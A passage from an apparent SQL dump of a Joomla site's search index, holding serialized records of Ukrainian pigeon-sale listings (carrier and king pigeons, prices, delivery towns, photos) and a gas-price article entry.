:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2485\";s:5:\"route\";s:128:\"index.php?option=com_content&view=article&id=2485:vartist-prirodnogo-gazu-v-listopadi-2020-roku-v-rozrizi-postachalnikiv&catid=8\";s:5:\"title\";s:129:\"Вартість природного газу в листопаді 2020 року в розрізі постачальників\";s:11:\"description\";s:55:\" за матеріалами https://gazpravda.com.ua/ \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-10-31 10:59:40\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-10-31 10:59:40\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4741,'index.php?option=com_content&view=article&id=2466','index.php?option=com_content&view=article&id=2466:molodi-poshtovi-golubi&catid=126','Молоді поштові голуби',' В наявності 20 штук молодих поштових 2020 року. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Хмільник.Телефонуйте 0508320922, домовимось. Фото голубів можна переглянути за посиланням : https://malehus.in.ua/index.php/foto/fotohalereia/poshtovi-holubyhttps://malehus.in.ua/index.php/foto/fotohalereia/poshtovi-holuby ','2020-11-06 17:16:01','c61f4fc27074a22bb503b7f9ad0cdf2e',1,1,1,'*','2020-09-03 17:33:11','0000-00-00 00:00:00','2020-09-03 17:33:11','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2466\";s:5:\"alias\";s:22:\"molodi-poshtovi-golubi\";s:7:\"summary\";s:1863:\"<!--StartFragment--><p style=\"margin: 13px 0px; padding: 0px; color: rgb(41, 43, 39); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; background-color: rgb(255, 255, 255);\"><span style=\"font-family: Verdana, Geneva;\"><strong>В наявності 20 штук молодих поштових 2020 року. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю,&nbsp;<!--StartFragment-->Хмільник.Телефонуйте 0508320922, домовимось. Фото голубів можна переглянути за посиланням</strong>:</span>&nbsp;<a href=\"https://malehus.in.ua/index.php/foto/fotohalereia/poshtovi-holuby\">https://malehus.in.ua/index.php/foto/fotohalereia/poshtovi-holubyhttps://malehus.in.ua/index.php/foto/fotohalereia/poshtovi-holuby</a></p><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/post_gol.jpg\"><img alt=\"\" class=\"fr-dii fr-fin\" src=\"https://malehus.in.ua/images/stories/post_gol.jpg\"></a><br></p><p><br></p><!--EndFragment--><p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/NfS1pt4-VUo\" width=\"560\"></iframe></span><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/I4jMCeSKe8c\" width=\"560\"></iframe></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"126\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-11-06 15:16:01\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:2:\"15\";s:8:\"ordering\";s:1:\"1\";s:8:\"category\";s:14:\"Поштові\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:27:\"2466:molodi-poshtovi-golubi\";s:7:\"catslug\";s:12:\"126:poshtovi\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:54:\"/index.php/holuby/poshtovi/2466-molodi-poshtovi-golubi\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"Поштові\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"Поштові\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2466\";s:5:\"route\";s:82:\"index.php?option=com_content&view=article&id=2466:molodi-poshtovi-golubi&catid=126\";s:5:\"title\";s:40:\"Молоді поштові голуби\";s:11:\"description\";s:500:\" В наявності 20 штук молодих поштових 2020 року. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Хмільник.Телефонуйте 0508320922, домовимось. Фото голубів можна переглянути за посиланням : https://malehus.in.ua/index.php/foto/fotohalereia/poshtovi-holubyhttps://malehus.in.ua/index.php/foto/fotohalereia/poshtovi-holuby \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-09-03 17:33:11\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-09-03 17:33:11\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4749,'index.php?option=com_content&view=article&id=2488','index.php?option=com_content&view=article&id=2488:poshtovi-golubi&catid=126','Поштові голуби.',' В наявності є птиця 20 року так і минулих років. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч. Ціна 100, телефонуйте 0508320922, домовимось . ','2020-12-15 20:40:48','3361eb009064847c0c76dceb17b04f0b',1,1,1,'*','2020-12-15 18:20:08','0000-00-00 00:00:00','2020-12-15 18:20:08','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2488\";s:5:\"alias\";s:15:\"poshtovi-golubi\";s:7:\"summary\";s:1530:\"<!--StartFragment--><p style=\"text-align: left;\"><span style=\"font-family: Times New Roman,Times; font-size: 15px;\">В наявності є птиця 20 року так і минулих років. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч. Ціна 100, телефонуйте 0508320922, домовимось</span>.</p><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/12_1.jpg\"><img alt=\"\" class=\"fr-fin fr-dii\" src=\"https://malehus.in.ua/images/stories/12_1.jpg\" width=\"456\"></a><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/12_2.jpg\"><img alt=\"\" class=\"fr-fin fr-dii\" src=\"https://malehus.in.ua/images/stories/12_2.jpg\" width=\"364\"></a><br></p><p><br><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/12_5.jpg\"><img alt=\"\" class=\"fr-fin fr-dii\" src=\"https://malehus.in.ua/images/stories/12_5.jpg\" width=\"863\"></a>&nbsp;&nbsp;</p><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/12_3.jpg\"><img alt=\"\" class=\"fr-fil fr-dib\" src=\"https://malehus.in.ua/images/stories/12_3.jpg\" title=\"\" width=\"388\"></a><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/12_6.jpg\"><img alt=\"\" class=\"fr-fil fr-dib\" src=\"https://malehus.in.ua/images/stories/12_6.jpg\" width=\"392\"></a><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/12_4.jpg\"><img alt=\"\" class=\"fr-fil fr-dib\" src=\"https://malehus.in.ua/images/stories/12_4.jpg\" title=\"\" width=\"393\"></a></p><!--EndFragment-->\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"126\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-12-15 18:40:48\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"7\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"Поштові\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:20:\"2488:poshtovi-golubi\";s:7:\"catslug\";s:12:\"126:poshtovi\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:47:\"/index.php/holuby/poshtovi/2488-poshtovi-golubi\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"Поштові\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"Поштові\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2488\";s:5:\"route\";s:75:\"index.php?option=com_content&view=article&id=2488:poshtovi-golubi&catid=126\";s:5:\"title\";s:28:\"Поштові голуби.\";s:11:\"description\";s:297:\" В наявності є птиця 20 року так і минулих років. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч. Ціна 100, телефонуйте 0508320922, домовимось . \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-12-15 18:20:08\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-12-15 18:20:08\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4753,'index.php?option=com_content&view=article&id=2489','index.php?option=com_content&view=article&id=2489:kingi-20-roku&catid=127','Кінги 20 року',' В наявності є два молодих кінга. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч. Ціна 300, телефонуйте 0508320922, домовимось. ','2020-12-15 20:57:23','5d3637676682185cf85f84b6c2362e11',1,1,1,'*','2020-12-15 18:54:14','0000-00-00 00:00:00','2020-12-15 18:54:14','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2489\";s:5:\"alias\";s:13:\"kingi-20-roku\";s:7:\"summary\";s:874:\"<!--StartFragment--><p>В наявності є два молодих кінга. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч. Ціна 300, телефонуйте 0508320922, домовимось.</p><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/12_k_1.jpg\"><img alt=\"\" class=\"fr-fin fr-dii\" src=\"https://malehus.in.ua/images/stories/12_k_1.jpg\" width=\"576\"></a><br></p><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/12_k_2.jpg\"><img alt=\"\" class=\"fr-fin fr-dii\" src=\"https://malehus.in.ua/images/stories/12_k_2.jpg\" width=\"577\"></a><br></p><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/12_k_3.jpg\"><img alt=\"\" class=\"fr-fin fr-dii\" src=\"https://malehus.in.ua/images/stories/12_k_3.jpg\" width=\"578\"></a><br></p><!--EndFragment-->\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"127\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-12-15 18:57:23\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"4\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:10:\"Кінги\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:18:\"2489:kingi-20-roku\";s:7:\"catslug\";s:9:\"127:kinhy\";s:6:\"author\";s:10:\"Super 